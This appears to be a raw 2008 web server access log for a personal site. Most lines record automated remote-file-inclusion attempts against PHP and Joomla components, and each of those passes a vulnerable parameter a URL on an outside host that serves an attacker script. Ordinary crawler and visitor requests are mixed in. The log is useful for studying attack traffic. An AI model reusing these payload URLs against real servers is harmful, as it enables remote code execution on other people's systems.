87.106.27.17 - - [17/Jun/2008:19:03:41 -0500] "GET /logs/access_log.1198713600 HTTP/1.1" 200 109219 "-""-"
207.213.245.215 - - [17/Jun/2008:19:05:40 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
207.213.245.215 - - [17/Jun/2008:19:05:41 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
83.98.208.5 - - [17/Jun/2008:19:06:35 -0500] "GET /logs/access_log.1208649600//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:35 -0500] "GET //errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:35 -0500] "GET /logs//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:36 -0500] "GET /logs/access_log.1208649600//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:36 -0500] "GET //errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:36 -0500] "GET /logs//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:38 -0500] "GET /logs/access_log.1208649600//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:38 -0500] "GET //errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:06:38 -0500] "GET /logs//errors.php?error=http://www.proostjes.be/calendar/spe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
216.128.67.107 - - [17/Jun/2008:19:13:42 -0500] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
216.128.67.107 - - [17/Jun/2008:19:13:43 -0500] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
72.15.200.252 - - [17/Jun/2008:19:14:52 -0500] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
72.15.200.252 - - [17/Jun/2008:19:14:52 -0500] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:15:20 -0500] "GET /logs/scanhttp://super4host.com/spe.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
83.98.208.5 - - [17/Jun/2008:19:15:20 -0500] "GET /scanhttp://super4host.com/spe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
67.15.114.74 - - [17/Jun/2008:19:19:46 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
67.15.114.74 - - [17/Jun/2008:19:19:46 -0500] "GET //skin/zero_vote/error.php?dir=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
212.25.170.52 - - [17/Jun/2008:19:23:41 -0500] "GET /logs///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lodolo.com/x??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
212.25.170.52 - - [17/Jun/2008:19:23:41 -0500] "GET ///ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://lodolo.com/x??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.213.245.215 - - [17/Jun/2008:19:26:20 -0500] "GET /logs//?page=http://nozyk.org/rob.txt? HTTP/1.1" 200 87952 "-""libwww-perl/5.65"
207.213.245.215 - - [17/Jun/2008:19:26:25 -0500] "GET //?page=http://nozyk.org/rob.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
87.106.18.76 - - [17/Jun/2008:19:28:11 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.106.18.76 - - [17/Jun/2008:19:28:16 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
61.222.167.228 - - [17/Jun/2008:19:31:01 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://superxsonic.net/id.gif?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
61.222.167.228 - - [17/Jun/2008:19:31:12 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://superxsonic.net/id.gif?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
195.110.147.194 - - [17/Jun/2008:19:32:13 -0500] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.69"
195.110.147.194 - - [17/Jun/2008:19:32:15 -0500] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.69"
61.222.167.228 - - [17/Jun/2008:19:37:58 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://superxsonic.net/id.gif?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
61.222.167.228 - - [17/Jun/2008:19:38:01 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://superxsonic.net/id.gif?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:19:45:56 -0500] "GET /logs/home.php?sit=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:19:45:57 -0500] "GET /home.php?sit=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
67.19.74.194 - - [17/Jun/2008:19:55:09 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
67.19.74.194 - - [17/Jun/2008:19:55:09 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.810"
216.246.7.234 - - [17/Jun/2008:19:55:51 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
216.246.7.234 - - [17/Jun/2008:19:55:51 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.810"
72.29.81.233 - - [17/Jun/2008:19:56:34 -0500] "GET /logs/home.php?sit=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
72.29.81.233 - - [17/Jun/2008:19:56:35 -0500] "GET /home.php?sit=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
150.165.231.5 - - [17/Jun/2008:19:58:14 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
150.165.231.5 - - [17/Jun/2008:19:58:15 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
72.29.77.203 - - [17/Jun/2008:20:00:24 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
72.29.77.203 - - [17/Jun/2008:20:00:25 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 359 "-""libwww-perl/5.811"
201.40.125.3 - - [17/Jun/2008:20:01:13 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
207.44.238.63 - - [17/Jun/2008:20:04:07 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
207.44.238.63 - - [17/Jun/2008:20:04:07 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
201.47.86.153 - - [17/Jun/2008:20:10:27 -0500] "GET /logs//errors.php?error=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
201.47.86.153 - - [17/Jun/2008:20:10:27 -0500] "GET //errors.php?error=http://sucomais2.angelfire.com/safe.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
87.106.18.76 - - [17/Jun/2008:20:15:23 -0500] "GET /logs/access_log.1203552000//login.php?dir=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.252.149.15 - - [17/Jun/2008:20:22:01 -0500] "GET http://tomdolan.pconline.com:80/robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.15 - - [17/Jun/2008:20:22:03 -0500] "GET / HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
87.106.18.76 - - [17/Jun/2008:20:22:29 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
87.106.18.76 - - [17/Jun/2008:20:22:34 -0500] "GET //init_basic.php?GALLERY_BASEDIR=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:22:57 -0500] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:22:58 -0500] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:22:58 -0500] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:22:58 -0500] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Jun/2008:20:23:55 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Jun/2008:20:23:56 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:32:14 -0500] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:32:15 -0500] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:32:15 -0500] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:32:15 -0500] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.184.2.186 - - [17/Jun/2008:20:39:13 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.79"
91.184.2.186 - - [17/Jun/2008:20:39:13 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
67.215.231.90 - - [17/Jun/2008:20:39:34 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.215.231.90 - - [17/Jun/2008:20:39:34 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/bot3id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.19.120.178 - - [17/Jun/2008:20:40:30 -0500] "GET /logs/toolbar.php?dirDepth=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
67.19.120.178 - - [17/Jun/2008:20:40:31 -0500] "GET /toolbar.php?dirDepth=http://www.bgdgrouponline.com/images/prop/ids.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
77.232.68.17 - - [17/Jun/2008:20:45:40 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
77.232.68.17 - - [17/Jun/2008:20:45:40 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.185.237.32 - - [17/Jun/2008:20:46:02 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.185.237.32 - - [17/Jun/2008:20:46:02 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.185.237.32 - - [17/Jun/2008:20:46:11 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.185.237.32 - - [17/Jun/2008:20:46:11 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
211.76.128.155 - - [17/Jun/2008:20:46:25 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.76.128.155 - - [17/Jun/2008:20:46:25 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
87.102.101.139 - - [17/Jun/2008:20:46:59 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:46:59 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:46:59 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
87.102.101.139 - - [17/Jun/2008:20:46:59 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
195.110.147.194 - - [17/Jun/2008:20:47:09 -0500] "GET /logs//server_stats/administrator/components/com_peoplebook/param.peoplebook.phphttp://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 408 "-""libwww-perl/5.69"
195.110.147.194 - - [17/Jun/2008:20:47:11 -0500] "GET //server_stats/administrator/components/com_peoplebook/param.peoplebook.phphttp://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 403 "-""libwww-perl/5.69"
211.76.128.155 - - [17/Jun/2008:20:51:10 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
211.76.128.155 - - [17/Jun/2008:20:51:11 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
67.215.231.90 - - [17/Jun/2008:20:53:30 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.215.231.90 - - [17/Jun/2008:20:53:31 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.6.17.158 - - [17/Jun/2008:20:56:41 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.20.85.150 - - [17/Jun/2008:20:59:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /logs/access_log.1174953600/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /logs/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /logs/access_log.1174953600/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:52 -0500] "GET /logs/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:58 -0500] "GET /logs/access_log.1188086400/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
205.234.215.105 - - [17/Jun/2008:21:03:59 -0500] "GET /logs/access_log.1188086400/index1.php?main=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
81.26.215.132 - - [17/Jun/2008:21:06:53 -0500] "GET /logs/toolbar.php?dirDepth=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
81.26.215.132 - - [17/Jun/2008:21:06:53 -0500] "GET /toolbar.php?dirDepth=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
211.76.128.155 - - [17/Jun/2008:21:08:53 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.76.128.155 - - [17/Jun/2008:21:08:53 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.29.81.233 - - [17/Jun/2008:21:09:26 -0500] "GET /logs/index.php3?act=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
72.29.81.233 - - [17/Jun/2008:21:09:26 -0500] "GET /index.php3?act=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
201.40.125.3 - - [17/Jun/2008:21:14:06 -0500] "GET /logs/access_log.1208649600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
201.40.125.3 - - [17/Jun/2008:21:14:07 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
201.40.125.3 - - [17/Jun/2008:21:14:07 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
81.26.215.132 - - [17/Jun/2008:21:14:42 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
81.26.215.132 - - [17/Jun/2008:21:14:42 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://h.b-warez.com/kk/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
211.76.128.155 - - [17/Jun/2008:21:16:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
211.76.128.155 - - [17/Jun/2008:21:17:02 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ajmu.no-ip.biz:8090/appserv/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
65.55.208.120 - - [17/Jun/2008:21:17:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [17/Jun/2008:21:17:22 -0500] "GET /logs/access_log.1171756800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [17/Jun/2008:21:17:22 -0500] "GET /logs/access_log.1154563200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [17/Jun/2008:21:17:23 -0500] "GET /logs/access_log.1160352000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
150.165.231.5 - - [17/Jun/2008:21:17:45 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
150.165.231.5 - - [17/Jun/2008:21:17:46 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
65.101.85.50 - - [17/Jun/2008:21:18:15 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:15 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:24 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:24 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:24 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:25 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:25 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:25 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
65.101.85.50 - - [17/Jun/2008:21:18:25 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)"
